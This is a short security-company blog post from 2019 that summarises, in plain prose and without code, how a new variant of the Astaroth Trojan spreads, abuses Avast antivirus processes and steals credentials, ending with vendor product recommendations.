We Live Data Security

Nerd Out On Our Latest Thoughts

FYI: The Astaroth Trojan

[fa icon="calendar"] Feb 22, 2019 8:00:00 AM / by Carl Keyser

astaroth_trojan_2

You might of heard recently that the Astaroth Trojan is making a comeback. We break down what it is, why it's making a comeback and more...

Despite having a name that makes it sound like a lost Michael Crichton novel of Swedish Death Metal, the Astaroth Trojan is a nasty piece of code. The trojan was first detected in 2017 after it was used in multiple South American cyber attacks.

Historically solicited by email and corrupt attachments, the Trojan uses Windows Management Instrumentation Console and its command line interface to download and instal its payload. Typically its used a non-interactive mode to hide what it's doing from the enduser.

To avoid detection Astaroth hid in plain site, using a seemingly safe domain with an additional URL snippet added on that points to its payload. Past versions, upon being installed would scan for antivirus software. If antivirus was found on the endpoint the malware would shut itself down.

This new version behaves differently. The Trojan's payload typically disguises itself as a JPEG, GIF or an extension-less attachment. Once downloaded and opened, the new Astaroth Trojan actually leverages antivirus software, specifically Avast Free Antivirus, to inject a malicious module into one of its processes. Upon installation the malware begins to log keystrokes, intercept operating system calls and gather other PII info to steal credentials and passwords.

Because Avast is one of the most used antivirus solutions on the planet, this could be a particularly nasty piece of Malware.

The new variant was discovered by the fine folk that make up Cybereason's Nocturnus Research team (also not a Death Metal band...I'm starting to see a trend here...hmmm...).

You can read more about Astaroth here (https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil) on Cybereason's blog. We'll keep you up to date if we hear anything else regarding Astaroth. Until then, if you're using Avast we recommend you try something different. We personally recommend Cybereason's EDR platform or CylancePROTECT.

Have anything you'd like to share regarding this topic? Lets us know by leaving a comment.

Interested in learning more about Security7 Networks? Download our free Intelligence in Depth guide today!

Topics: Malware, Cybereason, Trojan

Subscribe to Email Updates

Lists by Topic

see all